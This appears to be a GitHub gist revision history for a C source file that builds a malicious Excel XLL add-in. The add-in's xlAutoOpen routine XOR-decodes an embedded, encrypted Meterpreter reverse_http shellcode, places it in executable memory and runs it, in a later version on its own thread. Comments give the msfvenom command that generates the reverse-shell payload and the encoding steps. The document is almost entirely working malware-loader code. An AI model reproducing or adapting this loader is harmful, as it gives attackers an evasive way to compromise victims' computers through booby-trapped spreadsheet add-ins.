Skip to content

Instantly share code, notes, and snippets.

@CyDoor

CyDoor/shellcode_multibyteXOR_ExcelRegisterXLL.c

Forked from Arno0x/shellcode_multibyteXOR_ExcelRegisterXLL.c
Created December 28, 2017 05:17
Show Gist options

  • Select an option

    Learn more about clone URLs
  • Save CyDoor/a63f945ed2b57398d1bc247f5f12ffa2 to your computer and use it in GitHub Desktop.

Select an option

Learn more about clone URLs
Save CyDoor/a63f945ed2b57398d1bc247f5f12ffa2 to your computer and use it in GitHub Desktop.
Download ZIP

Revisions

  1. @Arno0x Arno0x revised this gist Jul 26, 2017. 1 changed file with 12 additions and 2 deletions.
    14 changes: 12 additions & 2 deletions shellcode_multibyteXOR_ExcelRegisterXLL.c
    View file
    Original file line number Diff line number Diff line change
    @@ -11,8 +11,8 @@

    __declspec(dllexport) void __cdecl xlAutoOpen(void);

    void __cdecl xlAutoOpen() {
    DWORD WINAPI ThreadFunction(LPVOID lpParameter)
    {
    // Encrypted shellcode and cipher key obtained from shellcode_encoder.py
    unsigned char encryptedShellcode[] = "\x88\x8d\xf1\x74\x6b\x65\x19\xfd\x80\x42\xb4\x0f\xee\x29\x44\xee\x21\x78\xe0\x37\x6d\xff\x17\x5b\x7b\xdc\x2f\x5f\x45\x9a\xdf\x48\x0a\x19\x7b\x58\x45\xb2\xbb\x66\x64\xbe\x96\x97\x21\x23\xe0\x37\x69\xff\x2f\x4f\xff\x27\x74\x01\x97\x2d\x72\xa5\x3a\xee\x20\x54\x64\xa0\xff\x22\x7d\x9a\x4e\x2c\xf8\x40\xe0\x64\xaf\x45\x9a\xdf\xb5\xa4\x68\x78\xb3\x5d\x93\x01\x9d\x66\x04\x8c\x5e\x0e\x50\x1e\x81\x21\xff\x3d\x57\x75\xb8\x03\xf2\x78\x2e\xf8\x2c\x77\x64\xaa\xff\x61\xf8\x75\xbb\xec\x3d\x50\x41\x28\x2f\x0a\x3c\x23\x25\x9a\x93\x2b\x34\x3f\xf2\x66\x8e\xfe\x29\x03\x0b\x1c\x00\x65\x1b\x03\x02\x0b\x10\x20\x0d\x3f\x03\x4d\x62\x86\xa1\x54\xa8\x27\x38\x36\x2a\x27\x0d\x49\x22\x12\xc2\x86\xa1\x36\x20\x1e\x68\x36\x2a\x1e\x35\x9b\xe3\x6b\x65\x79\x5b\x2c\x2c\x44\x09\x3d\x33\x1d\x1f\x36\x23\x5a\x0d\x2c\x19\x27\x27\x3b\x28\x33\x32\x3f\x24\x34\x02\x39\x0c\x4c\x18\x48\x01\x20\x13\x5c\x30\x46\x27\x16\x06\x6b\x35\x11\x23\xec\xec\xb2\x94\xb0\xf0\xb2\x36\x1b\x74\x69\x05\xfd\x27\x36\x20\x23\x38\x33\x11\x9f\x30\x5d\x4f\x94\xb0\xef\x1e\x6f\x2c\x27\x38\x36\x2a\x22\x0d\x5e\x72\x73\x1e\x86\xa1\xe0\xb3\x01\x63\x2a\x0c\x99\x8d\x3f\x74\x6b\x65\x13\x34\x0d\x73\x64\x6b\x65\x11\x74\x65\x33\x74\x38\x0d\x21\xd0\x36\x96\x8b\xbe\xf6\x2a\x27\xec\x94\x23\x03\x65\x59\x74\x65\x20\x22\x03\x77\xef\xfd\x87\x8c\xa1\xee\xa5\x0d\xbb\xee\x74\x75\xa8\xe0\xb9\x01\x80\x2b\xb7\x34\x8d\xf2\x8b\x9a\x8c\x15\x05\x1c\x57\x03\x00\x11\x07\x02\x11\x1c\x5a\x06\x1c\x19\x6b\xde\x89\xc1\xc7\x25\x1e\x6b\x36\x86\xa1";
    unsigned char key[] = "testkey";
    @@ -38,6 +38,16 @@ void __cdecl xlAutoOpen() {

    // Call the shellcode
    ((void(*)())exec)();

    return 1;
    }

    void __cdecl xlAutoOpen()
    {
    HANDLE threadHandle;
    // Create a thread and close the handle as we do not want to use it to wait for it
    threadHandle = CreateThread(NULL, 0, ThreadFunction, NULL, 0, NULL);
    CloseHandle(threadHandle);
    }

    BOOL APIENTRY DllMain( HMODULE hModule,
  2. @Arno0x Arno0x revised this gist Jul 25, 2017. 1 changed file with 1 addition and 1 deletion.
    2 changes: 1 addition & 1 deletion shellcode_multibyteXOR_ExcelRegisterXLL.c
    View file
    Original file line number Diff line number Diff line change
    @@ -1,7 +1,7 @@
    // Compile with:
    // cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
    //
    // CPP code obtained like this:
    // C/CPP code obtained like this:
    // 1. Get a raw meterpreter shellcode:
    // msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
    // 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
  3. @Arno0x Arno0x revised this gist Jul 25, 2017. 2 changed files with 57 additions and 55 deletions.
    57 changes: 57 additions & 0 deletions shellcode_multibyteXOR_ExcelRegisterXLL.c
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,57 @@
    // Compile with:
    // cl.exe x86_meterpreter_reverse_http_xor.c /LD /o x86_meterpreter_reverse_http_xor.xll
    //
    // CPP code obtained like this:
    // 1. Get a raw meterpreter shellcode:
    // msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
    // 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
    // ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

    #include <Windows.h>

    __declspec(dllexport) void __cdecl xlAutoOpen(void);

    void __cdecl xlAutoOpen() {

    // Encrypted shellcode and cipher key obtained from shellcode_encoder.py
    unsigned char encryptedShellcode[] = "\x88\x8d\xf1\x74\x6b\x65\x19\xfd\x80\x42\xb4\x0f\xee\x29\x44\xee\x21\x78\xe0\x37\x6d\xff\x17\x5b\x7b\xdc\x2f\x5f\x45\x9a\xdf\x48\x0a\x19\x7b\x58\x45\xb2\xbb\x66\x64\xbe\x96\x97\x21\x23\xe0\x37\x69\xff\x2f\x4f\xff\x27\x74\x01\x97\x2d\x72\xa5\x3a\xee\x20\x54\x64\xa0\xff\x22\x7d\x9a\x4e\x2c\xf8\x40\xe0\x64\xaf\x45\x9a\xdf\xb5\xa4\x68\x78\xb3\x5d\x93\x01\x9d\x66\x04\x8c\x5e\x0e\x50\x1e\x81\x21\xff\x3d\x57\x75\xb8\x03\xf2\x78\x2e\xf8\x2c\x77\x64\xaa\xff\x61\xf8\x75\xbb\xec\x3d\x50\x41\x28\x2f\x0a\x3c\x23\x25\x9a\x93\x2b\x34\x3f\xf2\x66\x8e\xfe\x29\x03\x0b\x1c\x00\x65\x1b\x03\x02\x0b\x10\x20\x0d\x3f\x03\x4d\x62\x86\xa1\x54\xa8\x27\x38\x36\x2a\x27\x0d\x49\x22\x12\xc2\x86\xa1\x36\x20\x1e\x68\x36\x2a\x1e\x35\x9b\xe3\x6b\x65\x79\x5b\x2c\x2c\x44\x09\x3d\x33\x1d\x1f\x36\x23\x5a\x0d\x2c\x19\x27\x27\x3b\x28\x33\x32\x3f\x24\x34\x02\x39\x0c\x4c\x18\x48\x01\x20\x13\x5c\x30\x46\x27\x16\x06\x6b\x35\x11\x23\xec\xec\xb2\x94\xb0\xf0\xb2\x36\x1b\x74\x69\x05\xfd\x27\x36\x20\x23\x38\x33\x11\x9f\x30\x5d\x4f\x94\xb0\xef\x1e\x6f\x2c\x27\x38\x36\x2a\x22\x0d\x5e\x72\x73\x1e\x86\xa1\xe0\xb3\x01\x63\x2a\x0c\x99\x8d\x3f\x74\x6b\x65\x13\x34\x0d\x73\x64\x6b\x65\x11\x74\x65\x33\x74\x38\x0d\x21\xd0\x36\x96\x8b\xbe\xf6\x2a\x27\xec\x94\x23\x03\x65\x59\x74\x65\x20\x22\x03\x77\xef\xfd\x87\x8c\xa1\xee\xa5\x0d\xbb\xee\x74\x75\xa8\xe0\xb9\x01\x80\x2b\xb7\x34\x8d\xf2\x8b\x9a\x8c\x15\x05\x1c\x57\x03\x00\x11\x07\x02\x11\x1c\x5a\x06\x1c\x19\x6b\xde\x89\xc1\xc7\x25\x1e\x6b\x36\x86\xa1";
    unsigned char key[] = "testkey";
    void *exec;

    // Char array to host the deciphered shellcode
    unsigned char shellcode[sizeof encryptedShellcode];

    // XOR decoding stub using the key defined above must be the same as the encoding key
    int j = 0;
    int i;
    for (int i = 0; i < sizeof encryptedShellcode; i++) {
    if (j == sizeof key - 1) j = 0;
    shellcode[i] = encryptedShellcode[i] ^ key[j];
    j++;
    }

    // Allocating memory with EXECUTE writes
    exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // Copying deciphered shellcode into memory as a function
    memcpy(exec, shellcode, sizeof shellcode);

    // Call the shellcode
    ((void(*)())exec)();
    }

    BOOL APIENTRY DllMain( HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
    {
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
    }
    return TRUE;
    }
    55 changes: 0 additions & 55 deletions shellcode_multibyteXOR_ExcelRegisterXLL.cpp
    View file
    Original file line number Diff line number Diff line change
    @@ -1,55 +0,0 @@
    // Compile with:
    // cl.exe x86_meterpreter_reverse_http_xor.cpp /LD /o x86_meterpreter_reverse_http_xor.xll
    //
    // CPP code obtained like this:
    // 1. Get a raw meterpreter shellcode:
    // msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
    // 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
    // ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

    #include <Windows.h>

    __declspec(dllexport) void __cdecl xlAutoOpen(void);

    void __cdecl xlAutoOpen() {

    // Encrypted shellcode and cipher key obtained from shellcode_encoder.py
    char encryptedShellcode[] = "\x88\x8d\xf1\x74\x6b\x65\x19\xfd\x80\x42\xb4\x0f\xee\x29\x44\xee\x21\x78\xe0\x37\x6d\xff\x17\x5b\x7b\xdc\x2f\x5f\x45\x9a\xdf\x48\x0a\x19\x7b\x58\x45\xb2\xbb\x66\x64\xbe\x96\x97\x21\x23\xe0\x37\x69\xff\x2f\x4f\xff\x27\x74\x01\x97\x2d\x72\xa5\x3a\xee\x20\x54\x64\xa0\xff\x22\x7d\x9a\x4e\x2c\xf8\x40\xe0\x64\xaf\x45\x9a\xdf\xb5\xa4\x68\x78\xb3\x5d\x93\x01\x9d\x66\x04\x8c\x5e\x0e\x50\x1e\x81\x21\xff\x3d\x57\x75\xb8\x03\xf2\x78\x2e\xf8\x2c\x77\x64\xaa\xff\x61\xf8\x75\xbb\xec\x3d\x50\x41\x28\x2f\x0a\x3c\x23\x25\x9a\x93\x2b\x34\x3f\xf2\x66\x8e\xfe\x29\x03\x0b\x1c\x00\x65\x1b\x03\x02\x0b\x10\x20\x0d\x3f\x03\x4d\x62\x86\xa1\x54\xa8\x27\x38\x36\x2a\x27\x0d\x49\x22\x12\xc2\x86\xa1\x36\x20\x1e\x68\x36\x2a\x1e\x35\x9b\xe3\x6b\x65\x79\x5b\x2c\x2c\x44\x09\x3d\x33\x1d\x1f\x36\x23\x5a\x0d\x2c\x19\x27\x27\x3b\x28\x33\x32\x3f\x24\x34\x02\x39\x0c\x4c\x18\x48\x01\x20\x13\x5c\x30\x46\x27\x16\x06\x6b\x35\x11\x23\xec\xec\xb2\x94\xb0\xf0\xb2\x36\x1b\x74\x69\x05\xfd\x27\x36\x20\x23\x38\x33\x11\x9f\x30\x5d\x4f\x94\xb0\xef\x1e\x6f\x2c\x27\x38\x36\x2a\x22\x0d\x5e\x72\x73\x1e\x86\xa1\xe0\xb3\x01\x63\x2a\x0c\x99\x8d\x3f\x74\x6b\x65\x13\x34\x0d\x73\x64\x6b\x65\x11\x74\x65\x33\x74\x38\x0d\x21\xd0\x36\x96\x8b\xbe\xf6\x2a\x27\xec\x94\x23\x03\x65\x59\x74\x65\x20\x22\x03\x77\xef\xfd\x87\x8c\xa1\xee\xa5\x0d\xbb\xee\x74\x75\xa8\xe0\xb9\x01\x80\x2b\xb7\x34\x8d\xf2\x8b\x9a\x8c\x15\x05\x1c\x57\x03\x00\x11\x07\x02\x11\x1c\x5a\x06\x1c\x19\x6b\xde\x89\xc1\xc7\x25\x1e\x6b\x36\x86\xa1";
    char key[] = "testkey";

    // Char array to host the deciphered shellcode
    char shellcode[sizeof encryptedShellcode];

    // XOR decoding stub using the key defined above must be the same as the encoding key
    int j = 0;
    for (int i = 0; i < sizeof encryptedShellcode; i++) {
    if (j == sizeof key - 1) j = 0;
    shellcode[i] = encryptedShellcode[i] ^ key[j];
    j++;
    }

    // Allocating memory with EXECUTE writes
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // Copying deciphered shellcode into memory as a function
    memcpy(exec, shellcode, sizeof shellcode);

    // Call the shellcode
    ((void(*)())exec)();
    }

    BOOL APIENTRY DllMain( HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
    {
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
    }
    return TRUE;
    }
  4. @Arno0x Arno0x created this gist Jul 25, 2017.
    55 changes: 55 additions & 0 deletions shellcode_multibyteXOR_ExcelRegisterXLL.cpp
    View file
    Original file line number Diff line number Diff line change
    @@ -0,0 +1,55 @@
    // Compile with:
    // cl.exe x86_meterpreter_reverse_http_xor.cpp /LD /o x86_meterpreter_reverse_http_xor.xll
    //
    // CPP code obtained like this:
    // 1. Get a raw meterpreter shellcode:
    // msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=any.website.com LPORT=80 EnableStageEncoding=True StageEncoder=x86/shikata_ga_nai > met_rev_winhttp_x86.raw
    // 2. Encrypt it with a custom multibyte XOR string (https://github.com/Arno0x/ShellcodeWrapper):
    // ./shellcode_encoder.py -cpp met_rev_winhttp_x86.raw testkey xor

    #include <Windows.h>

    __declspec(dllexport) void __cdecl xlAutoOpen(void);

    void __cdecl xlAutoOpen() {

    // Encrypted shellcode and cipher key obtained from shellcode_encoder.py
    char encryptedShellcode[] = "\x88\x8d\xf1\x74\x6b\x65\x19\xfd\x80\x42\xb4\x0f\xee\x29\x44\xee\x21\x78\xe0\x37\x6d\xff\x17\x5b\x7b\xdc\x2f\x5f\x45\x9a\xdf\x48\x0a\x19\x7b\x58\x45\xb2\xbb\x66\x64\xbe\x96\x97\x21\x23\xe0\x37\x69\xff\x2f\x4f\xff\x27\x74\x01\x97\x2d\x72\xa5\x3a\xee\x20\x54\x64\xa0\xff\x22\x7d\x9a\x4e\x2c\xf8\x40\xe0\x64\xaf\x45\x9a\xdf\xb5\xa4\x68\x78\xb3\x5d\x93\x01\x9d\x66\x04\x8c\x5e\x0e\x50\x1e\x81\x21\xff\x3d\x57\x75\xb8\x03\xf2\x78\x2e\xf8\x2c\x77\x64\xaa\xff\x61\xf8\x75\xbb\xec\x3d\x50\x41\x28\x2f\x0a\x3c\x23\x25\x9a\x93\x2b\x34\x3f\xf2\x66\x8e\xfe\x29\x03\x0b\x1c\x00\x65\x1b\x03\x02\x0b\x10\x20\x0d\x3f\x03\x4d\x62\x86\xa1\x54\xa8\x27\x38\x36\x2a\x27\x0d\x49\x22\x12\xc2\x86\xa1\x36\x20\x1e\x68\x36\x2a\x1e\x35\x9b\xe3\x6b\x65\x79\x5b\x2c\x2c\x44\x09\x3d\x33\x1d\x1f\x36\x23\x5a\x0d\x2c\x19\x27\x27\x3b\x28\x33\x32\x3f\x24\x34\x02\x39\x0c\x4c\x18\x48\x01\x20\x13\x5c\x30\x46\x27\x16\x06\x6b\x35\x11\x23\xec\xec\xb2\x94\xb0\xf0\xb2\x36\x1b\x74\x69\x05\xfd\x27\x36\x20\x23\x38\x33\x11\x9f\x30\x5d\x4f\x94\xb0\xef\x1e\x6f\x2c\x27\x38\x36\x2a\x22\x0d\x5e\x72\x73\x1e\x86\xa1\xe0\xb3\x01\x63\x2a\x0c\x99\x8d\x3f\x74\x6b\x65\x13\x34\x0d\x73\x64\x6b\x65\x11\x74\x65\x33\x74\x38\x0d\x21\xd0\x36\x96\x8b\xbe\xf6\x2a\x27\xec\x94\x23\x03\x65\x59\x74\x65\x20\x22\x03\x77\xef\xfd\x87\x8c\xa1\xee\xa5\x0d\xbb\xee\x74\x75\xa8\xe0\xb9\x01\x80\x2b\xb7\x34\x8d\xf2\x8b\x9a\x8c\x15\x05\x1c\x57\x03\x00\x11\x07\x02\x11\x1c\x5a\x06\x1c\x19\x6b\xde\x89\xc1\xc7\x25\x1e\x6b\x36\x86\xa1";
    char key[] = "testkey";

    // Char array to host the deciphered shellcode
    char shellcode[sizeof encryptedShellcode];

    // XOR decoding stub using the key defined above must be the same as the encoding key
    int j = 0;
    for (int i = 0; i < sizeof encryptedShellcode; i++) {
    if (j == sizeof key - 1) j = 0;
    shellcode[i] = encryptedShellcode[i] ^ key[j];
    j++;
    }

    // Allocating memory with EXECUTE writes
    void *exec = VirtualAlloc(0, sizeof shellcode, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

    // Copying deciphered shellcode into memory as a function
    memcpy(exec, shellcode, sizeof shellcode);

    // Call the shellcode
    ((void(*)())exec)();
    }

    BOOL APIENTRY DllMain( HMODULE hModule,
    DWORD ul_reason_for_call,
    LPVOID lpReserved
    )
    {
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
    break;
    }
    return TRUE;
    }